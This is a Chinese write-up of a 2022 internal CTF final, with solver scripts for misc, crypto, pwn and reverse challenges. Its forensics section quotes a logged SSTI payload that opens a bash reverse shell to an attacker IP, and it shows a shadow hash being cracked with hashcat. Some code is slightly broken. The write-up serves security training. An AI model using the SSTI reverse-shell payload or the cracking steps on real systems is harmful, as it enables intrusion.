内部赛-2022第二届网络安全攻防大赛团队赛-决赛WriteUp

Misc

Checkin

Cyberchef 自动解码。

sercetLab

是以前某次赛题。

流程大意为:输入正确的flag,取前13位,转为byte数组,与37异或,然后转回字符串,与串“CIDB^RiFeH@z”比较,得到一个布尔值 13位以后的字符,前后翻转,转为转为byte数组,减去0x0D,加上0x0A,再与37异或,转回字符串,与串“_zlySoyIT” (z后面有个不可见字符)比较,得到一个布尔值 两个布尔值做与非计算,输出结果给一个指示灯。 由此可知,flag的前13位计算后即为“CIDB^RiFeH@z”,后若干位计算后即为“_zlySoyIT” (z后面有个不可见字符) 接下来用两个字符串反向计算,编写脚本: xor='%' str='CIDB^R`iFeH@z' for i in range(len(str)):     print(chr(ord(str[i])^ord(xor[i%len(xor)])),end="") str1="" xor='%' str='_zlySoyIT' for i in range(len(str)):     str1 += chr(ord(str[i])^ord(xor[i%len(xor)])) str2="" for i in range(len(str1)):     str2 += chr(ord(str1[i])+3) for i in range(len(str2),0,-1):     print(str2[i-1],end="") 运行后得到flag{wELc@me_to_My_L@b}

LogisticFile

Logistic 置乱

试了 1-256 异或结果不对,使用大量的重复字符。进行轮异或。

字符。进行轮异或。

f = open('file', 'rb').read()

xor = 'x0=0.35,miu=3'
f1 = open(f'xorxor', 'wb')
for i, c in enumerate(f):
    x = ord(xor[i % len(xor)])
    f1.write(bytes([c ^ x]))
    f1.close()
    print('next')

直接拿提示脚本。运行。得到 flag.

import cv2
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image

def logic_encrypt(im, x0, mu):
    xsize, ysize = im.shape
    # print(xsize, ysize)
    im = np.array(im).flatten()
    num = len(im)
    
    for i in range(100):
        x0 = mu * x0 * (1-x0)
        
    E = np.zeros(num)
    E[0] = x0
    for i in range(0,num-1):
        E[i+1] = mu * E[i]* (1-E[i])
    E = np.round(E*255).astype(np.uint8)

    im = np.bitwise_xor(E,im)
    im = im.reshape(xsize,ysize,-1)
    im = np.squeeze(im)
    im = Image.fromarray(im)
    
    return im

img = cv2.imread('fff.jpeg',0)
img = logic_encrypt(img,0.35,3)
f = np.fft.fft2(img)
fshift = np.fft.fftshift(f)
s = np.log(np.abs(fshift))

plt.imshow(s,'gray')
plt.imsave("logic_encrypt.png",s)
plt.show()

XiaoMing's Memory

考点:制作 profile 参考以下链接:
https://blog.bi0s.in/2021/08/20/Forensics/InCTFi21-TheBigScore/
Linux新版内核下内存取证分析附CTF题 https://mp.weixin.qq.com/s/dbHGBzjcMoF8aPqIkCN_Fg

使用 vol的 linux 相关命令提取信息,不要用windows提取命令.

恢复 /etc/shadow拿到用户hash为 \(1\)o2jjXFfH$VIk/lkh5/74iPQDvRodDT.
用hashcat跑一下rockyou.txt得到密码为 sunshine

在文件列表找到这个

0xffff9760b286d240                   1197979 /snap/home/john-doe/Documents/nohup.out
0xffff9760b25bc120                   1197763 /snap/home/john-doe/Documents/.log
0xffff9760b25bdad0                   1197758 /snap/home/john-doe/Documents/nonono.py

在nohup.out 找到反弹shell的访问IP及端口

192.168.199.131 - - [12/Sep/2021 05:55:49] "GET /?id={{''.__class__.__bases__[0].__subclasses__()[-1].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5OS4xMzEvODg4OCAwPiYx | base64 -d > /tmp/evilll").read()')}} HTTP/1.1" 200 -
192.168.199.131/8888

文件名是 nonono.py

同样可以在 netstat中进行确认

UDP	0.0.0.0	:44880 0.0.0.0	:	0	systemd-timesyn/703  
UDP	127.0.0.53	:   53 0.0.0.0	:	0	systemd-resolve/704  
UDP	0.0.0.0	: 5353 0.0.0.0	:	0	avahi-daemon/783  
UDP	::	: 5353 ::	:	0	avahi-daemon/783  
UDP	0.0.0.0	:49805 0.0.0.0	:	0	avahi-daemon/783  
UDP	::	:50863 ::	:	0	avahi-daemon/783  
TCP	::1	:  631 ::	:	0 LISTEN	cupsd/815  
TCP	127.0.0.1	:  631 0.0.0.0	:	0 LISTEN	cupsd/815  
TCP	0.0.0.0	: 8080 0.0.0.0	:	0 LISTEN	python3/3959 
TCP	192.168.199.133 : 8080 192.168.199.131 :55515 ESTABLISHED	python3/3959 			
TCP	192.168.199.133 :35488 192.168.199.131 : 8888 ESTABLISHED	bash/3989 			
UDP	0.0.0.0	:   68 0.0.0.0	:	0	dhclient/4102 
TCP	192.168.199.133 :51966 34.107.221.82   :   80 ESTABLISHED	MainThread/4166 			
TCP	192.168.199.133 :60610 52.88.96.248	:  443 ESTABLISHED	MainThread/4166 		

最后说是上网浏览。在目录里有firefox。 访问里录里有搜到 信息隐藏技术。
在firefox浏览记录里找到 https://www.kpaste.net/c4a5c ,标题是secret,那就是这个了。

[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+((![]+[])[+[]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+[+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]])[(![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]]((!![]+[])[+[]])[([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]](([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]]+![]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])()[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])+[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]])())

https://enkhee-osiris.github.io/Decoder-JSFuck/

function secretFunc() {   const secret = '6b57dcd6-460b-4eb3-9190-d99a03ef4685';   return true; }

md5(sunshine-192.168.199.131:8888-nonono.py-6b57dcd6-460b-4eb3-9190-d99a03ef4685)

Crypto

Simple

羊城杯 2020 原题

from sage.all import *
from Crypto.Util.number import *
from Crypto.Cipher import DES
import gmpy2
from Crypto.Util.number import *
from gmpy2 import invert

e1 = 1038188773022222237625162518466985515806685046439847462572843423800303080199415368325579099819361640945202226526678764311585592296933622966635366454130900252466567292666094830865094694540899938932650663694321540899409821558619513870070621174837528024755540950294728078653453000484865860920060355130142874882872471337494879275434166435493265146752291857135290428750750609423353579700984426964475724965353873095813181244686536072523222027403912142730610262067287620007571352094447066062529895627497159337248165671672168914514241613626520037706745398642583257608070477729851466078618962204332539106519787878047712382699
e2 = 2837849440271663829778449470456059993823700375016504578318494102782617180188657051885856137280051100635878402423110369686929227684421486015532180997159960436120141492683886715611434986294622600612428406093623932339780091710632795226634412256078611259843109876301975664056868908063144172636320692414857287719870275516722663234436495523740203192523105607062687910252368627072074836944313105637959564954309098651598325997792496430340003856687190484681832529188281328826421428597879086043647647886763379182416419551074016810300511817626177321217978912504879476086100668005286481779806010131350674761039391612993646202901
c = 5973798238952580291825915383143493132916118834759984908567429997405141389115327100612059752092101975323145558282778289524466024564450720131251849100687215493221989801105144437981685382023973692198113306045957788268110316519461230170693204752380105917975206409994893101671098451678847638671373239757408532363808224681853024689663345258120864348816343897379881239786554998688501997609152329902187048422237325117741778968505252184157273467466011959504548459297647302026380076579903441434135973514451254950835559924204821846949520738057940287763572642367638668413987340659205489659594044022422368411980101640782079189025
N = 26901814699902439156457451193693740730489294959491270367027927283506475930489639407729426818974347303153364758700002407059993182986763909124690390655890031474097185414651218374672254140022392199647526025638012909369532528422355530044873378287920255523382224453173638818751280227521077881224963029942704252587893395262633450759457753054490886171089835324182422639138198164026845488515879253564971977801724349440235209377091735281830263780308625603392942624306475075157394231585266792247387837984357822842056801420064918953837917678662504712605611080802179768683537742095990507008809197788025847612652983474906829809607

a = 0.356  # 731./2049
M1 = N ** 0.5
M2 = N ** (a + 1)
D = diagonal_matrix(ZZ, [N, M1, M2, 1])
M = matrix(ZZ, [[1, -N, 0, N ** 2], [0, e1, -e1, -e1 * N], [0, 0, e2, -e2 * N], [0, 0, 0, e1 * e2]]) * D
L = M.LLL()
t = vector(ZZ, L[0])
x = t * M ** (-1)
phi = int(x[1] / x[0] * e1)
d = invert(0x10001, phi)
m = pow(c, d, N)
print(long_to_bytes(m))

two old man

威尔逊定理加CRT

# -*- coding: utf-8 -*-
from Crypto.Util.number import long_to_bytes, isPrime
from gmpy2 import invert, powmod
from libnum import solve_crt
from functools import reduce

n = 85300075344029411815824595503988243445862905766678219075505308650733618833670564881852727486124268400610986787128098448019033364495139613324970241727110931819892696714818851281415775513570277910383275087114654129682377412912019832281317957560043184535419626656895668221654944747681971549122289940681069900407
c = 9573652589542765552302771253681350397003834739308979745013100413124314842798363931809688570564520116621700487372591176287735200842509675988724251662626729985842786542792501720096155870937426730816107184806453412679852267311433564241907769415712680798333238722253896962273334726781549003053182286964079196169
e = 65537
p = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625526487
q = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625528161

d = invert(e, (p-1)*(q-1))
assert p*q == n
m = pow(c, d, n)
d1 = invert(p-1, p)
print(f'd1 = {d1}')
m1 = m * d1 % p
print(f'm1 = {m1}')
s = reduce(lambda x,y: x * y % n, range(p, q), 1)
d2 = invert(s, q)
s = d2 * (q - 1) % q
d2 = invert(s, q)
print(f'd2 = {d2}')
m2 = m * d2 % q
print(f'm2 = {m2}')
m = solve_crt((m1, m2), (p, q))
print(long_to_bytes(m)[:-80])
b'flag{c7cfdbc1-729b-de11-239f-a473ec0637b8}'

Pwn

deadly

签到题,直接将环境地址填上,执行 cat flag

Reverse

obb

xxtea 解密和GKCTF2021 Somuchcode基本一致。

参考文章
https://blog.csdn.net/m0_51911432/article/details/123120168
https://tianyu.xin/index.php/rev/Somuchcode.html

  do
    ++v3;
  while ( *((_BYTE *)input + v3) ); // strlen
  sub_7FF656DE1420((unsigned int)(v3 >> 2), input, &key); // >>2 == // 4 , 4字节一组,下一行是比较 这边明显是加密了。

进入后在input交叉引用找到

  v71 = a2[a1 - 1]; 再交叉引用v71得到
...
  v347 = ((v301 >> 3) ^ (16 * v71)) + ((v71 >> 5) ^ (4 * v301));

这就明显是xxtea了。然后找到加密串解密即可。

# https://blog.csdn.net/A951860555/article/details/120120400
from ctypes import *


def MX(z, y, total, key, p, e):
    temp1 = (z.value >> 5 ^ y.value << 2) + (y.value >> 3 ^ z.value << 4)
    temp2 = (total.value ^ y.value) + (key[(p & 3) ^ e.value] ^ z.value)

    return c_uint32(temp1 ^ temp2)

